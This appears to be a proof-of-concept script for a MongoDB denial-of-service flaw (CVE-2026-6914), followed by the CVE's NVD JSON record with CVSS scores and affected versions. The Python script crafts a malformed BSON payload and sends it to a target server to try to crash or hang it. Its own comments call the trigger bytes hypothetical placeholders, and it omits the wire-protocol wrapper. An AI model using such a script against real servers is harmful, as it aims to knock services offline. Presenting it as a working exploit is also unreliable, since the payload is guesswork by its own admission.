CVE-2026-6914

# PoC for CVE-2026-6914 # Description: This script demonstrates how a malformed BSON object might trigger the DoS vulnerability in MongoDB. # Note: The exact byte pattern required to trigger the MD5 calculation issue is hypothetical and based on the CVE description. import socket import struct import time def create_malformed_bson_payload(): """ Creates a hypothetical malformed BSON object. The goal is to craft an object that, when its MD5 checksum is calculated, causes the server to crash or hang. """ # BSON document structure: <length><content><terminator> # Example payload with potential manipulation to trigger the bug # This is a placeholder structure; actual exploit requires specific bytes. malformed_data = b"\x02" + b"trigger" + b"\x00" + b"A" * 1024 + b"\x00" # String type length = struct.pack("<i", len(malformed_data) + 5) bson_payload = length + malformed_data + b"\x00" return bson_payload def send_mongodb_payload(host, port, payload): """ Sends the payload to the target MongoDB server. """ try: print(f"[*] Connecting to {host}:{port}...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((host, port)) # Construct a MongoDB OP_MSG or generic query wrapper containing the malformed BSON # For simplicity, we are sending raw bytes to test parser robustness print("[*] Sending malformed BSON payload...") s.send(payload) # Wait a moment to see if the server crashes or stops responding time.sleep(2) print("[+] Payload sent. Check server status.") except ConnectionResetError: print("[!] Connection reset by peer - Possible crash detected!") except socket.timeout: print("[!] Socket timeout - Server may be hanging (Possible DoS).") except Exception as e: print(f"[-] An error occurred: {e}") finally: s.close() if __name__ == "__main__": TARGET_HOST = "127.0.0.1" TARGET_PORT = 27017 payload = create_malformed_bson_payload() send_mongodb_payload(TARGET_HOST, TARGET_PORT, payload)

{"cve": {"id": "CVE-2026-6914", "sourceIdentifier": "[email protected]", "published": "2026-04-29T17:16:41.230", "lastModified": "2026-05-06T20:11:08.547", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Computing the MD5 checksum of a malformed BSON object under specific conditions may cause loss of availability in MongoDB server.\nThis issue affects all MongoDB Server v8.2 versions, all MongoDB Server v8.1 versions, MongoDB Server v8.0 versions prior to 8.0.21, MongoDB Server v7.0 versions prior to 7.0.32"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-191"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.32", "matchCriteriaId": "D5CAB4F7-13B9-4DB3-B017-B4149D840730"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.21", "matchCriteriaId": "63369E86-3FBF-4FE5-B8D0-06A4A600FD0B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*", "versionStartIncluding": "8.1.0", "versionEndExcluding": "8.2.7", "matchCriteriaId": "19FB73B7-C6FA-4889-8579-582293F99F43"}]}]}], "references": [{"url": "https://jira.mongodb.org/browse/SERVER-119981", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}]}}